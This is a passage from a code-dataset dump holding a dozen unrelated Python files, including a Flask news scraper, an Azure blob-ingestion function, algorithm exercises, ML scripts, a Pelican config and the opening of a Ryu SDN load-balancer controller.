\"title\": content.title,\n \"text\": content.text,\n \"link\": content.url,\n \"keywords\": content.keywords,\n \"top_image\": content.top_image,\n \"published\": content.publish_date.isoformat(),\n }\n news_paper[\"articles\"].append(article)\n print(\n f\"{count} articles downloaded from {company} using newspaper, url: {content.url}, keywords:{content.keywords}, top_images:{content.top_image}\"\n )\n count = count + 1\n none_type_count = 0\n return count, news_paper\n\n\ndef run(config, limit=4):\n \"\"\"Take a config object of sites and urls, and an upper limit. Iterate through each news company.\n Write result to scraped_articles.json.\"\"\"\n for company, value in config.items():\n count = 1\n if \"rss\" in value:\n count, news_paper = _handle_rss(company, value, count, max_articles_from_single_source_limit)\n else:\n count, news_paper = _handle_fallback(company, value, count, max_articles_from_single_source_limit)\n data[\"newspapers\"][company] = news_paper\n\n # Finally it saves the articles as a JSON-file.\n try:\n with open(\"scraped_articles.json\", \"w\") as outfile:\n json.dump(data, outfile, indent=2)\n except Exception as err:\n print(err)\n\ndef news():\n \"\"\"News site scraper.\"\"\"\n try:\n config = parse_config(\"NewsPapers.json\")\n except Exception as err:\n sys.exit(err)\n run(config)\n\n#------------------------------------------------------------\n### APIS\n\n### Returns the list of all articles from scraped_articles.json\n\n@app.route(\"/get-top-news-articles/\", methods=['GET'])\ndef get_top_news_articles():\n\n news()\n articles_list = []\n with open(\"scraped_articles.json\", \"r\") as data_file:\n scraped_file = json.load(data_file)\n\n for papers, eachpaper in scraped_file.items():\n for paper, link_and_articles in eachpaper.items():\n if \"link\" not in link_and_articles:\n raise ValueError(f\"Configuration item {link_and_articles} missing obligatory 'link'.\")\n else:\n for article in link_and_articles['articles']:\n articles_list.append(article)\n \n return jsonify(articles_list)\n\n### Accepts the article the user clicks on and sends it's keywords \n### to the twitter data extraction function\n\n@app.route(\"/post-selected-news-article/\", methods=['GET','POST'])\ndef post_selected_news_article():\n response_object = {'status': 'success'}\n if request.method == 'POST':\n # print( request.get_json() )\n for keyword in request.get_json()['keywords']:\n print(keyword)\n break\n return jsonify(response_object)\n\n# @app.route(\"/get-selected-news-keywords/\", methods=['GET'])\n# def get_selected_news_keywords():\n\n# keywords_list = []\n# with open(\"scraped_articles.json\", \"r\") as data_file:\n# scraped_file = json.load(data_file)\n\n# for comp, paper in scraped_file.items():\n# for b, value in paper.items():\n# if \"link\" not in value:\n# raise ValueError(f\"Configuration item {value} missing obligatory 'link'.\")\n# else:\n# for article in value['articles']:\n# for keyword in article['keywords']:\n# print(\"hi\")\n# keywords_list.append(keyword)\n \n# return jsonify(keywords_list)\n\n# @app.route(\"/get-top-news-keywords/\", methods=['GET'])\n# def get_top_news_keywords():\n\n# keywords_list = []\n# with open(\"scraped_articles.json\", \"r\") as data_file:\n# scraped_file = json.load(data_file)\n\n# for comp, paper in scraped_file.items():\n# for b, value in paper.items():\n# if \"link\" not in value:\n# raise ValueError(f\"Configuration item {value} missing obligatory 'link'.\")\n# else:\n# for article in value['articles']:\n# for keyword in article['keywords']:\n# keywords_list.append(keyword)\n \n# return jsonify(keywords_list)\n\n\n#-----------------------------\n\nif __name__ == '__main__':\n # Threaded option to enable multiple instances for multiple user access support\n app.run(threaded=True, port=5000)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"132046713","text":"import numpy as np\nimport tensorflow as tf\n\nclass Agent(tf.keras.Model):\n def __init__(\n self,\n model,\n n_actions,\n n_features,\n learning_rate=0.01,\n reward_decay=0.99,\n e_greedy=0.1,\n replace_target_iter=300,\n batch_size=32,\n e_greedy_decrement=None,\n epsilon_decay_step=10**6,\n update_interval=1,\n optimizer=None,\n trainable=True,\n is_dueling=False,\n is_categorical=False,\n is_noise=False,\n gpu=0):\n super().__init__()\n self.model = model\n self.n_actions = n_actions\n self.actions_list = list(range(self.n_actions))\n self.n_features = n_features if isinstance(n_features, tuple) else (n_features,)\n self.lr = learning_rate\n self.discount = tf.constant(reward_decay) #discount\n self.epsilon_min = e_greedy\n self.replace_target_iter = replace_target_iter\n self.update_interval = update_interval\n self.batch_size = batch_size\n self._optimizer = optimizer\n self.is_dueling = is_dueling\n self.is_categorical = is_categorical\n self.is_noise = is_noise\n self.trainable = trainable\n self.epsilon = 0.0 if self.is_noise else 0.9\n self.epsilon_decrement = e_greedy_decrement if e_greedy_decrement is not None else (self.epsilon - self.epsilon_min)/ epsilon_decay_step\n self.device = \"/gpu:{}\".format(gpu) if gpu >= 0 else \"/cpu:0\"\n\n # total learning step\n self._iteration = 0\n\n def _build_net(self):\n if hasattr(self.__class__.__name__, 'main_net') == False:\n raise Exception('please set build net')\n if self._optimizer is None:\n raise Exception('please set Optimizer')\n\n def inference(self, state):\n raise NotImplementedError()\n\n def choose_action(self, observation, test=False):\n raise NotImplementedError()","sub_path":"agent/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"574283329","text":"import logging\nimport os, uuid, sys\nimport azure.functions as func\nimport asyncio\nimport uuid\nimport json\nimport pathlib\n\nfrom ..shared_code import storage_helpers\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n\n logging.info('IngestionTrigger function processed a request.')\n\n STORAGE_NAME = os.environ['STORAGE_ACCOUNT_NAME']\n STORAGE_KEY = os.environ['STORAGE_ACCOUNT_KEY']\n SAS_TOKEN = os.environ['STORAGE_SAS_TOKEN']\n CONTAINER = os.environ['DATA_CONTAINER']\n STATUS_TABLE = os.environ['STATUS_TABLE']\n UPLOAD_QUEUE = os.environ['UPLOAD_QUEUE']\n\n blobService = storage_helpers.createBlobService(STORAGE_NAME,STORAGE_KEY)\n queueService = storage_helpers.createQueueService(STORAGE_NAME,STORAGE_KEY)\n tableService = storage_helpers.createTableService(STORAGE_NAME,STORAGE_KEY)\n\n if(blobService != None and queueService != None and tableService != None):\n\n print(\"OK\")\n blobGenerator = storage_helpers.listBlobs(blobService,CONTAINER) \n # creating a blob list\n blobs = storage_helpers.generateBlobList(blobGenerator,CONTAINER,STORAGE_NAME,SAS_TOKEN)\n blobsToIngest = []\n\n for blob in blobs:\n # Check if blob was already ingested or not with the status table\n # The partition key is the container name and the row key is the blob name \n status = \"NotFound\"\n blobStatus = storage_helpers.queryEntity(tableService,STATUS_TABLE,CONTAINER,blob['name'])\n if(blobStatus != None):\n status = blobStatus\n # If the blob was never ingested or the ingestion failed, we want to ingest it\n if(status == 'NotFound' or status == 'failure'):\n blobsToIngest.append(blob)\n storage_helpers.addToQueue(queueService,UPLOAD_QUEUE,storage_helpers.createQueueMessage(blob))\n # Update status of blob to \"queued\"\n newBlobStatus = {'PartitionKey': CONTAINER, 'RowKey': blob['name'], 'status' : 'queued'}\n storage_helpers.insertOrMergeEntity(tableService,STATUS_TABLE,newBlobStatus)\n \n logging.info(\"%d blobs found in %s\" % (len(blobs),CONTAINER))\n logging.info(\"%d blobs to ingest in %s\" % (len(blobsToIngest),CONTAINER))\n\n else:\n logging.warning(\"Could not trigger the ingestion process.\")\n\n if blobService:\n return func.HttpResponse(f\"OK\",status_code=200)\n else:\n return func.HttpResponse(\n \"Error\",\n status_code=400\n )\n","sub_path":"IngestionTrigger/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"186421032","text":"def is_inside(a, b):\r\n xa = a[0]\r\n ya = a[1]\r\n xb = b[0]\r\n yb = b[1]\r\n w = b[2]\r\n h = b[3]\r\n if xa in range(xb,xb+h):\r\n if ya in range(yb, yb+w):\r\n return True\r\n else: return False\r\n else: return False\r\n \r\nif is_inside([100,100],[50,50,100,100]) == True:\r\n print(\"Your function is correct\")\r\nelse:\r\n print(\"Ooops, bugs detected\")\r\n","sub_path":"Session5/excercise_11_12.py","file_name":"excercise_11_12.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"549617595","text":"class Solution:\r\n def findMedianSortedArrays(self, nums1, nums2):\r\n lennums1=len(nums1)\r\n lennums2=len(nums2)\r\n if (lennums1+lennums2)%2==0:\r\n return (self.theKthnumber(nums1,nums2,(lennums1+lennums2)//2)+self.theKthnumber(nums1,nums2,(lennums1+lennums2)//2-1))/2\r\n else:\r\n return self.theKthnumber(nums1,nums2,(lennums1+lennums2)//2)\r\n\r\n\r\n def theKthnumber(self,nums1,nums2,k):\r\n if len(nums1)>len(nums2):\r\n return self.theKthnumber(nums2,nums1,k)\r\n if len(nums1)==0:\r\n return nums2[k]\r\n if k==0:\r\n return min(nums2[0],nums1[0])\r\n if nums1[len(nums1)//2]>nums2[len(nums2)//2]:\r\n if k>len(nums1)//2+len(nums2)//2:\r\n return self.theKthnumber(nums1, nums2[len(nums2) // 2+1:], k - len(nums2) // 2-1)\r\n else:\r\n return self.theKthnumber(nums1[:len(nums1) // 2], nums2, k)\r\n else:\r\n if k > len(nums1) // 2 + len(nums2) // 2:\r\n return self.theKthnumber(nums1[len(nums1) // 2+1:], nums2, k - len(nums1) // 2-1)\r\n else:\r\n return self.theKthnumber(nums1, nums2[:len(nums2) // 2], k)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n def findMedianSortedArrays1(self, nums1, nums2):\r\n if nums1==[]:\r\n if len(nums2)%2==0:\r\n return (nums2[len(nums2)//2]+nums2[len(nums2)//2-1])/2\r\n else:\r\n return nums2[len(nums2)//2]\r\n elif nums2==[]:\r\n if len(nums1)%2==0:\r\n return (nums1[len(nums1)//2]+nums1[len(nums1)//2-1])/2\r\n else:\r\n return nums1[len(nums1)//2]\r\n else:\r\n n = len(nums1) + len(nums2)\r\n if n % 2 != 0: # [2,2,2,2][2,2,2]\r\n # nums2 left of nums1\r\n if n // 2 > len(nums2) and nums1[n // 2 - len(nums2)] >= nums2[-1]:\r\n return nums1[n // 2 - len(nums2)]\r\n elif n // 2 == len(nums2) and nums1[n // 2 - len(nums2)] >= nums2[-1]:\r\n return nums1[n // 2 - len(nums2)]\r\n elif n // 2 < len(nums2) and nums1[0] >= nums2[n // 2]:\r\n return nums2[n // 2]\r\n elif n // 2 == len(nums2) and nums1[0] >= nums2[-1]:\r\n return nums1[0]\r\n # nums2 right of nums1\r\n elif n // 2 >= len(nums1) and nums2[n // 2 - len(nums1)] >= nums1[-1]:\r\n return nums2[n // 2 - len(nums1)]\r\n elif n // 2 < len(nums1) and nums2[0] >= nums1[n // 2]:\r\n return nums1[n // 2]\r\n elif n // 2 == len(nums1) and nums2[0] >= nums1[-1]:\r\n return nums2[0]\r\n else:\r\n i = 1\r\n nums1_i = 0\r\n nums2_i = 0\r\n while i < n / 2:\r\n if nums1[nums1_i] >= nums2[nums2_i]:\r\n nums2_i = nums2_i + 1\r\n else:\r\n nums1_i = nums1_i + 1\r\n i = i + 1\r\n x = min(nums1[nums1_i], nums2[nums2_i])\r\n\r\n return x\r\n else:\r\n # nums2 left of nums1\r\n if n // 2 == len(nums2) and nums1[n // 2 - len(nums2)] >= nums2[-1]:\r\n return (nums1[0] + nums2[-1]) / 2\r\n elif n // 2 > len(nums2) and nums1[n // 2 - len(nums2)] >= nums2[-1]:\r\n return (nums1[n // 2 - len(nums2)] + max(nums1[n // 2 - len(nums2) - 1], nums2[-1])) / 2\r\n elif n // 2 == len(nums2) and nums1[0] >= nums2[-1]:\r\n return (nums2[-1] + nums1[0]) / 2\r\n elif n // 2 < len(nums2) and nums1[0] >= nums2[n // 2]:\r\n return (nums2[n // 2-1] + min(nums2[n // 2 ], nums1[0])) / 2\r\n # nums2 right of nums1\r\n elif n // 2 == len(nums1) and nums2[n // 2 - len(nums1)] >= nums1[-1]:\r\n return (nums2[0] + nums1[-1]) / 2\r\n elif n // 2 > len(nums1) and nums2[n // 2 - len(nums1)] >= nums1[-1]:\r\n return (nums2[n // 2 - len(nums1)] + max(nums2[n // 2 - len(nums1) - 1], nums1[-1])) / 2\r\n elif n // 2 == len(nums1) and nums2[0] >= nums1[-1]:\r\n return (nums1[-1] + nums2[0]) / 2\r\n elif n // 2 < len(nums1) and nums2[0] >= nums1[n // 2]:\r\n return (nums1[n // 2-1] + min(nums1[n // 2], nums2[0]))/2\r\n else:\r\n i = 1\r\n nums1_i = 0\r\n nums2_i = 0\r\n while i < n / 2:\r\n if nums1[nums1_i] >= nums2[nums2_i]:\r\n nums2_i = nums2_i + 1\r\n else:\r\n nums1_i = nums1_i + 1\r\n i = i + 1\r\n\r\n if nums1[nums1_i] >= nums2[nums2_i]:\r\n return (nums2[nums2_i] + min(nums2[nums2_i + 1],nums1[nums1_i]) )/ 2\r\n else:\r\n return (nums1[nums1_i]+min(nums1[nums1_i+1],nums2[nums2_i]))/2\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n A=[1]\r\n B=[1]\r\n Test=Solution()\r\n print(Test.findMedianSortedArrays(A,B))\r\n\r\n","sub_path":"Array/4. Median of Two Sorted Arrays.py","file_name":"4. Median of Two Sorted Arrays.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"629219396","text":"import requests, json, sys\nimport os.path\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nfrom system.SysCPU import SysCPU\nfrom system.SysService import SysService\nfrom system.SysOS import SysOS\nfrom system.SysDisc import SysDisc\nfrom system.SysMemory import SysMemory\nimport config\n\nclass Rest(object):\n\n token = open('data/token.dat', 'r')\n token = token.readline()\n\n def saveServiceInfo(self):\n services = SysService()\n data = []\n for service in services.service_list:\n data = {\"name\": service.name, \"status\": service.status.value, \"token\":self.token}\n requests.post(config.HOST+\"/api/service/\", data=data)\n\n def saveOSInfo(self):\n os = SysOS()\n os_info = os.OSinfo()\n data = {\"distributor_id\": os_info.distributor_id, \"release\": os_info.release,\n \"codename\": os_info.codename, \"description\": os_info.description, \"token\":self.token}\n requests.post(config.HOST+\"/api/os/\", data=data)\n\n def saveDiscInfo(self):\n disc = SysDisc()\n data = []\n for disc_info in disc.discs:\n data = {\"file_system\": disc_info.file_system, \"size\": disc_info.size, \"used\": disc_info.used,\n \"free\": disc_info.free, \"free_percent\": disc_info.free_percent, \"mounted_in\": disc_info.mounted_in, \"token\": self.token}\n requests.post(config.HOST+\"/api/disc/\", data=data)\n\n def saveMemoryInfo(self):\n memory = SysMemory()\n data = {\"free\": memory.memory.free, \"percent_used\": memory.memory.percent_used, \"total\": memory.memory.total, \"used\": memory.memory.used, \"token\": self.token }\n requests.post(config.HOST+\"/api/memory/\", data=data)\n\n def saveCPUInfo(self):\n cpu = SysCPU()\n cpu_info = cpu.CPUinfo()\n data = {\"architecture\": cpu_info.architecture, \"vendor_id\": cpu_info.vendor_id, \"model_name\": cpu_info.model_name,\n \"cpu_cores\": cpu_info.cpu_cores, \"percent_used\": cpu_info.percent_used, \"token\": self.token }\n requests.post(config.HOST+\"/api/cpu/\", data=data)\n","sub_path":"rest/Rest.py","file_name":"Rest.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"160559193","text":"\"\"\"\nThe idea here is that we'd like to use our library\nto minimize a function, say ** 2\n\"\"\"\nfrom autograd.tensor import Tensor\n\nx = Tensor([10, -10, 10, -5, 6, 3, 1],requires_grad=True)\n\n# we want to minimize the sum of squares\nfor i in range(100):\n # print(x)\n x.zero_grad()\n sum_of_squares = (x * x).sum() # is a 0-tensor\n sum_of_squares.backward()\n\n # what i would like to do\n # ugly b/c we haven't implemented the stuff yet\n delta_x = 0.1 * x.grad\n # print(delta_x.data,x.data)\n x -= delta_x\n print(i, sum_of_squares)","sub_path":"examples/minimize_a_function.py","file_name":"minimize_a_function.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"455264185","text":"# Copyright (C) 2015 Yipeng Sun \n# This software is distributed under the terms of the GNU GPL version 2.\n\n__license__ = 'GPLv2'\n__author__ = __maintainer__ = 'Yipeng Sun'\n__email__ = 'solarisbill@gmail.com'\n\n\nfrom .calc import RegressionGenerator\nfrom .fmt import ufloat, fmt, align_col\nfrom .rw import read_xlsx, xlsx_read_col, read_csv, write_csv\n\n__all__ = ['RegressionGenerator',\n 'ufloat', 'fmt', 'align_col',\n 'read_xlsx', 'xlsx_read_col', 'read_csv', 'write_csv'\n ]\n","sub_path":"physlab/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"60092197","text":"class Solution:\n \"\"\"\n @param logs: the logs\n @return: the log after sorting\n \"\"\"\n def logSort(self, logs):\n # Write your code here\n withInt = []\n withStr = []\n for i in logs:\n if i.split(' ')[-1].isdigit():\n withInt.append(i)\n else:\n withStr.append(i)\n \n return sorted(withStr, key = Solution.mykey) + withInt\n \n @staticmethod\n def mykey(x):\n pos = x.index(' ')\n return (x[pos+1:], x[:pos])\n \n \n \n ","sub_path":"Company/Amazon/OA_2/14. Reorder Log File/learning_solution.py","file_name":"learning_solution.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"651952708","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = 'Ray Alez'\nSITENAME = 'digitalmind'\nSITEURL = ''\n\nPATH = 'content'\nSTATIC_PATHS = [\n 'static/.htaccess',\n 'static/CNAME',\n 'images',\n ]\n\n\nTIMEZONE = 'Europe/Paris'\n\nDEFAULT_LANG = 'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = 'feeds/all.atom.xml' #None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('Pelican', 'http://getpelican.com/'),\n ('Python.org', 'http://python.org/'),\n ('Jinja2', 'http://jinja.pocoo.org/'),\n ('You can modify those links in your config file', '#'),)\n\n# Menu\nMENUITEMS = [('Home', '/'), ('Articles', '/articles')]\n\n# Social widget\nSOCIAL = (('You can add links in your config file', '#'),\n ('Another social link', '#'),)\n\nDEFAULT_PAGINATION = 8\n\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\nARTICLE_URL = 'post/{slug}'\nARTICLE_SAVE_AS = 'post/{slug}.html'\nPAGE_URL = '{slug}'\nPAGE_SAVE_AS = '{slug}.html'\n\n# TAG_URL = 'tag/{slug}/'\n# TAG_SAVE_AS = 'tag/{slug}/index.html'\n# TAGS_URL = 'tags/'\n# TAGS_SAVE_AS = 'tags/index.html'\n\n# PAGINATION_PATTERNS = (\n# (1, '{base_name}/posts/', '{base_name}/index.html'),\n# (2, '{base_name}/posts/{number}/', '{base_name}/posts/{number}/index.html'),\n#)\n\nDIRECT_TEMPLATES = ('index', 'tags', 'categories', 'archives', ) #'about'\n\nTAG_SAVE_AS = ''\nAUTHOR_SAVE_AS = ''\n\nTHEME = \"/home/ray/projects/digitalmind/themes/digitalmind\"\n\n# Plugins\nPLUGIN_PATHS = ['/home/ray/projects/digitalmind/pelican-plugins']\nPLUGINS = ['liquid_tags.img', 'liquid_tags.video',\n 'liquid_tags.include_code', 'liquid_tags.notebook']\n\nEXTRA_HEADER = open('_nb_header.html').read() #.encode('utf-8')\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"577235918","text":"import sys\n\nimport requests\n\nPY3 = sys.version_info[0] == 3\n\nif PY3: # pragma: nocover\n string_types = str,\n import io\n BytesIO = io.BytesIO\n\nelse: # pragma: nocover\n string_types = basestring,\n import StringIO\n BytesIO = StringIO.StringIO\n\n\nclass WithRequests(object):\n\n req_timeout = 10\n \n req_user_agent = (\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/74.0.3729.169 YaBrowser/19.6.2.594 (beta) Yowser/2.5 Safari/537.36'\n )\n\n @classmethod\n def _get_response(cls, url, **kwargs):\n\n kwargs_ = {\n 'timeout': cls.req_timeout,\n 'headers': {\n 'User-Agent': cls.req_user_agent\n },\n }\n kwargs_.update(kwargs)\n\n return requests.get(url, **kwargs_)\n","sub_path":"pycbrf/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"121481164","text":"# coding=utf8\n\nfrom ..commons.common import MyProcessor\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\nimport shelve,path\nimport itertools\n\n\nclass FeatureSelectProcessor(MyProcessor):\n \"\"\"采用日志去记录运行状况,通过日志来检查是否运行过了\"\"\"\n def __init__(self,dm,cv):\n self.__dm=dm\n self.__cv=cv\n self.__para = dict(n_estimators=500, max_depth=2, max_features=0.1,class_weight=\"balanced\",\n min_samples_leaf=4, random_state=0, n_jobs=7)\n\n def process(self, msg):\n df_all=msg[\"data\"]\n print(df_all.head())\n sample_name=msg[\"sample_name\"]\n\n df_train=self.__dm.prepare_train_df(df_all,sample_name)\n input_col,output_col,weight,info_col=self.__dm.cols\n\n clf = RandomForestClassifier()\n clf.set_params(**self.__para)\n\n clf.fit(df_train[input_col], df_train[output_col].values.reshape(-1), sample_weight=df_train[weight].values.reshape(-1))\n df_fi = pd.DataFrame()\n df_fi[\"feature_name\"] =input_col\n df_fi[\"importance\"] = clf.feature_importances_\n df_fi.sort_values(\"importance\",ascending=False,inplace=True)\n # 交叉验证\n res_cols={}\n self.__para=dict(n_estimators=500, max_depth=4, max_features=0.1,class_weight=\"balanced\",\n min_samples_leaf=4, random_state=0, n_jobs=7)\n clf = RandomForestClassifier()\n clf.set_params(**self.__para)\n ct = itertools.count()\n for k in list(range(1,5))+list(range(5,600,40)):\n cols=df_fi[\"feature_name\"][0:k].tolist()\n res_cols[k]=self.__cv.start_cv({\"clf\":clf,\"data\":df_all[info_col+cols]})\n print(\"========================This is the %s cycle of CV !=============\"%ct.__next__())\n\n with shelve.open(\"E:/my_proj/pre_fog/resources/fixed_data/Tuned4ModelData/FeatureSelectDOE/feature_select_result\") as db:\n db[\"data\"]=res_cols\n db[\"rank\"]=df_fi\n\n\nclass SelectModelParameter(MyProcessor):\n def __init__(self,cv):\n self.__cv=cv\n self.__para = dict(n_estimators=500, max_depth=4, max_features=0.1, class_weight=\"balanced\",\n min_samples_leaf=4, random_state=0, n_jobs=7)\n\n def process(self, msg):\n\n df_all = msg[\"data\"]\n print(df_all.head())\n\n # 交叉验证\n res_cols = {}\n para_path=r\"E:\\my_proj\\pre_fog\\resources\\fixed_data\\Tuned4ModelData\\FeatureSelectDOE\\para.csv\"\n\n ct = itertools.count()\n\n para_df=pd.read_csv(para_path)\n for i in para_df.index:\n para_dic=para_df.loc[i, :].to_dict()\n para_dic={k:float(v) if k in [\"max_features\"] else int(v) for k,v in para_dic.items()}\n self.__para.update(para_dic)\n clf = RandomForestClassifier()\n clf.set_params(**self.__para)\n res_cols[i]=self.__cv.start_cv({\"clf\":clf,\"data\":df_all})\n print(\"========================This is the %s cycle of CV !=============\" % ct.__next__())\n\n with shelve.open(\"E:/my_proj/pre_fog/resources/fixed_data/Tuned4ModelData/FeatureSelectDOE/para_select_result\") as db:\n db[\"data\"]=res_cols\n\n\n\n\n\n\n\n\n","sub_path":"resources/recognition_pre_fog/select_feature_para/processors.py","file_name":"processors.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"473349551","text":"\nfrom textblob.classifiers import NaiveBayesClassifier\n\ntrain = [\n ('I love this sandwich.', 'pos'),\n ('This is an amazing place!', 'pos'),\n ('I feel very good about these beers.', 'pos'),\n ('This is my best work.', 'pos'),\n (\"What an awesome view\", 'pos'),\n ('I do not like this restaurant', 'neg'),\n ('I am tired of this stuff.', 'neg'),\n (\"I can't deal with this\", 'neg'),\n ('He is my sworn enemy!', 'neg'),\n ('My boss is horrible.', 'neg')\n]\n\ncl = NaiveBayesClassifier(train)\nprint(cl.classify(\"Their burgers are amazing\"))\n","sub_path":"analytics/GARAGE/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"59332445","text":"from ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER, DEAD_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.lib.packet.packet import Packet\nfrom ryu.ofproto import ofproto_v1_3, ofproto_v1_5\nfrom ryu.lib.packet import packet\nfrom ryu.lib.packet import ethernet\nfrom ryu.lib.packet import tcp, udp, icmp\nfrom ryu.lib.packet import ether_types\nfrom ryu.lib.packet import ipv4\nfrom ryu.lib.packet import arp\nfrom operator import attrgetter\nfrom ryu.lib import hub\nimport datetime\nimport requests\nimport json\nimport re\nimport random\nimport os, subprocess\n\n\"\"\" \n TOPOLOGY:\n h1 --- * * --- h5 (server)\n | |\n h2 --- * --- s1 --- * --- h6 (server)\n | \n h3 --- * \n |\n h4 --- *\n\"\"\"\n\n\nclass SimpleLoadBalancer(app_manager.RyuApp):\n OFP_VERSIONS = [ofproto_v1_5.OFP_VERSION]\n virtual_ip = \"10.0.0.100\" # The virtual server IP\n H11_mac = \"00:00:00:00:00:0B\"\n H11_ip = \"10.0.0.11\"\n H12_mac = \"00:00:00:00:00:0C\"\n H12_ip = \"10.0.0.12\"\n H13_mac = \"00:00:00:00:00:0D\"\n H13_ip = \"10.0.0.13\"\n H14_mac = \"00:00:00:00:00:0E\"\n H14_ip = \"10.0.0.14\"\n group_table_id = 50\n rt = 'http://127.0.0.1:8008'\n ip_to_port = {\"10.0.0.1\": 1,\n \"10.0.0.2\": 2,\n \"10.0.0.3\": 3,\n \"10.0.0.4\": 4,\n \"10.0.0.5\": 5,\n \"10.0.0.6\": 6,\n \"10.0.0.7\": 7,\n \"10.0.0.8\": 8,\n \"10.0.0.9\": 9,\n \"10.0.0.10\": 10,\n \"10.0.0.11\": 11,\n \"10.0.0.12\": 12,\n \"10.0.0.13\": 13,\n \"10.0.0.14\": 14}\n ip_to_mac = {\"10.0.0.1\": \"00:00:00:00:00:01\",\n \"10.0.0.2\": \"00:00:00:00:00:02\",\n \"10.0.0.3\": \"00:00:00:00:00:03\",\n \"10.0.0.4\": \"00:00:00:00:00:04\",\n \"10.0.0.5\": \"00:00:00:00:00:05\",\n \"10.0.0.6\": \"00:00:00:00:00:06\",\n \"10.0.0.7\": \"00:00:00:00:00:07\",\n \"10.0.0.8\": \"00:00:00:00:00:08\",\n \"10.0.0.9\": \"00:00:00:00:00:09\",\n \"10.0.0.10\": \"00:00:00:00:00:0A\",\n \"10.0.0.11\": \"00:00:00:00:00:0B\",\n \"10.0.0.12\": \"00:00:00:00:00:0C\",\n \"10.0.0.13\": \"00:00:00:00:00:0D\",\n \"10.0.0.14\": \"00:00:00:00:00:0E\"}\n port_to_mac = {1: \"00:00:00:00:00:01\",\n 2: \"00:00:00:00:00:02\",\n 3: \"00:00:00:00:00:03\",\n 4: \"00:00:00:00:00:04\",\n 5: \"00:00:00:00:00:05\",\n 6: \"00:00:00:00:00:06\",\n 7: \"00:00:00:00:00:07\",\n 8: \"00:00:00:00:00:08\",\n 9: \"00:00:00:00:00:09\",\n 10: \"00:00:00:00:00:0A\",\n 11: \"00:00:00:00:00:0B\",\n 12: \"00:00:00:00:00:0C\",\n 13: \"00:00:00:00:00:0D\",\n 14: \"00:00:00:00:00:0E\"}\n port_to_ip = {1: \"10.0.0.1\",\n 2: \"10.0.0.2\",\n 3: \"10.0.0.3\",\n 4: \"10.0.0.4\",\n 5: \"10.0.0.5\",\n 6: \"10.0.0.6\",\n 7: \"10.0.0.7\",\n 8: \"10.0.0.8\",\n 9: \"10.0.0.9\",\n 10: \"10.0.0.10\",\n 11: \"10.0.0.11\",\n 12: \"10.0.0.12\",\n 13: \"10.0.0.13\",\n 14: \"10.0.0.14\"}\n throuhput = [0] * 15 # in kbps\n rx_bytes = [0] * 15\n loadBalancingAlgorithm = 'random' # 'random' / 'roundRobin' / 'leastBandwidth' / 'none'\n idle_timeout = 3\n hard_timeout = 10\n priority = 20\n\n def __init__(self, *args, **kwargs):\n super(SimpleLoadBalancer, self).__init__(*args, **kwargs)\n self.datapaths = {}\n self.elephant_flows = {}\n self.SendElephantFlowMonitor()\n if self.loadBalancingAlgorithm != 'none':\n self.elephant_thread = hub.spawn(self.ElephantFlowMonitor)\n self.monitor_thread = hub.spawn(self._monitor)\n self.tput_thread = hub.spawn(self.port_stats_monitor)\n self.logger.info(\"--------------------------------------------------------------\")\n self.logger.info(\"%s: STARTUP\", datetime.datetime.now().strftime('%H:%M:%S.%f'))\n self.logger.info(\"%s: Selected Load Balancing algorithm: %s\", datetime.datetime.now().strftime('%H:%M:%S.%f'),\n self.loadBalancingAlgorithm)\n self.logger.info(\"--------------------------------------------------------------\")\n with open('server_output_throughput.csv', 'w') as f:\n pass\n\n def _monitor(self):\n while True:\n self._request_stats()\n hub.sleep(0.5)\n\n def port_stats_monitor(self):\n while True:\n for dp in self.datapaths.values():\n self.port_stats(dp)\n 